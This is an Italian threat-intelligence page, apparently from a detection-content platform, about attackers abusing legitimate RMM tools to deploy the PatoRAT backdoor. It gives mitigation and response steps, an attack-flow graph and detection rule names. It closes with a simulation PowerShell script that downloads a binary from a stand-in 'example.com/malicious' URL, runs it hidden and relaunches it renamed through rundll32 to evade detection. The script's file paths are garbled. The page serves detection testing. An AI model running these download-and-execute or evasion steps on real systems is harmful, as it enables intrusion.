Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Gli attori delle minacce stanno abusando sempre più degli strumenti legittimi di monitoraggio e gestione remota (RMM)—come LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne e SuperOps—per distribuire malware e stabilire un accesso remoto persistente. La consegna iniziale avviene spesso tramite pagine di download malevole o email di phishing, seguita dall’esecuzione tramite PowerShell e dal dispiegamento di payload secondari come il backdoor PatoRAT. AhnLab EDR può rilevare l’esecuzione di queste utility RMM e generare avvisi basati sul comportamento riguardo alle attività sospette successive. Il rapporto sottolinea l’importanza di convalidare la provenienza del software e mantenere un monitoraggio continuo degli endpoint.
Indagine
AhnLab Security Intelligence Center ha osservato molteplici campagne in cui gli attaccanti hanno riconfezionato o mascherato gli installer RMM come applicazioni popolari (ad esempio, Notepad++, 7-Zip e Telegram) e li hanno distribuiti tramite siti web malevoli o allegati di phishing. Dopo l’installazione, gli agenti RMM si sono registrati alla loro infrastruttura fornitrice e sono stati poi utilizzati per eseguire payload PowerShell che hanno rilasciato PatoRAT. Attacchi simili sono apparsi su diversi prodotti RMM, incluso Syncro distribuito attraverso phishing con esche PDF. È stata sviluppata una logica di rilevamento AhnLab EDR per segnalare l’esecuzione di questi binari altrimenti legittimi e correlarla con i comportamenti post-installazione.
Mitigazione
Verifica le fonti di download, valida i certificati di firma del codice e confronta gli hash con le versioni del fornitore ufficiali prima di consentire il software RMM nell’ambiente. Enforce elenchi di permessi per le applicazioni e richiedi approvazioni esplicite per l’esecuzione RMM. Monitora l’avvio inatteso di binari RMM, l’attività anomala di PowerShell e le connessioni sospette ai domini dell’infrastruttura del fornitore quando tali strumenti non sono autorizzati. Mantieni i sistemi operativi e gli strumenti di sicurezza aggiornati per ridurre l’esposizione.
Risposta
Quando viene rilevata un’esecuzione RMM sospetta, isola l’host, raccogli artefatti forensi e rimuovi il binario non autorizzato. Blocca le connessioni in uscita alla infrastruttura dello strumento per interrompere i canali di controllo remoto, e esegui una scansione completa per payload secondari come PatoRAT. Aggiorna i contenuti di rilevamento con gli IOC osservati e informa il SOC sui modelli di campagna per un triage più rapido.
“graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access[“<b>Azione</b> – <b>T1204 Esecuzione Utente</b>: Le vittime scaricano installer RMM mascherati da software legittimi o aprono fatture PDF di phishing che reindirizzano a link malevoli.”] class node_initial_access action node_masquerading[“<b>Tecnica</b> – <b>T1036.008 Mascheramento</b>: Installer e PDF sono contraffatti per apparire come utility o documenti affidabili.”] class node_masquerading technique node_rmt_install[“<b>Strumento</b> – <b>Nome</b>: Strumenti di Accesso Remoto come LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps.”] class node_rmt_install tool node_powerShell[“<b>Tecnica</b> – <b>T1059.001 PowerShell</b>: L’attaccante esegue comandi PowerShell tramite la piattaforma RMM per scaricare e installare il backdoor PatoRAT.”] class node_powerShell technique node_patoRAT[“<b>Malware</b> – <b>Nome</b>: PatoRAT backdoor.”] class node_patoRAT malware node_software_deployment[“<b>Tecnica</b> – <b>T1072 Strumenti di Distribuzione Software</b>: Le soluzioni RMM sono sfruttate per distribuire ulteriori payload malevoli e mantenere la persistenza.”] class node_software_deployment technique node_lateral_exploit[“<b>Tecnica</b> – <b>T1210 Sfruttamento di Servizi Remoti</b>: Gli strumenti RMM compromessi sono usati per aprire sessioni remote e muoversi lateralmente nell’ambiente.”] class node_lateral_exploit technique node_rdp_hijack[“<b>Tecnica</b> – <b>T1563.002 Dirottamento di Sessione di Servizi Remoti</b>: Si esegue il dirottamento RDP per ottenere il controllo di host aggiuntivi.”] class node_rdp_hijack technique node_root_cert[“<b>Tecnica</b> – <b>T1553.004 Installazione di Certificato Radice</b>: I comandi PowerShell installano un certificato radice malevolo per eludere i controlli di sicurezza.”] class node_root_cert technique %% Connections node_initial_access u002du002d>|porta a| node_masquerading node_masquerading u002du002d>|porta a| node_rmt_install node_rmt_install u002du002d>|utilizza| node_powerShell node_powerShell u002du002d>|installa| node_patoRAT node_patoRAT u002du002d>|abilita| node_software_deployment node_software_deployment u002du002d>|facilita| node_lateral_exploit node_lateral_exploit u002du002d>|abilita| node_rdp_hijack node_powerShell u002du002d>|esegue| node_root_cert “
Flusso dell’attacco
Rilevamenti
Software di Accesso/Management Remoto Alternativo (via process_creation)
Visualizza
Tentativo di Installazione di Software RMM SuperOps Possibile (via file_event)
Visualizza
Software di Accesso/Management Remoto Alternativo (via audit)
Visualizza
Software di Accesso/Management Remoto Alternativo (via sistema)
Visualizza
Rilevamento dello Sfruttamento dello Strumento RMM per la Distribuzione di Malware [Creazione Processo Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il controllo pre-volo di Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione dell’Attacco e Comandi:
Un attaccante invia un’email di phishing contenente un allegato malevolo. L’allegato esegue uno script PowerShell che scarica il binario RMMLogMeIn.exetoC:Temp. Per eludere il rilevamento basato sul nome, l’attaccante rinomina il binario atool.exee lo avvia tramiterundll32.exe(T1216). Il binario RMM poi contatta il server C2 controllato dall’attaccante e lascia un payload backdoor. Dopo l’esecuzione, l’attaccante elimina il binario (T1542.004) per coprire le tracce. -
Script di Test di Regressione:
# --------------------------------------------------------------- # Simula lo sfruttamento dello strumento RMM (nome originale) – dovrebbe attivare # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Esecuzione del binario RMM originale (ci si aspetta un avviso)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simula evasione rinominando ed eseguendo via proxy – NON dovrebbe attivare # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Esecuzione del binario RMM rinominato tramite rundll32 (evasione)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Pulisci gli artefatti # --------------------------------------------------------------- Write-Host "[*] Pulizia dei binari..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulazione completata." -
Comandi di Pulizia:
# Assicurarsi che i processi rimanenti siano terminati Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Rimuovere eventuali file scaricati (se ancora esistenti) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue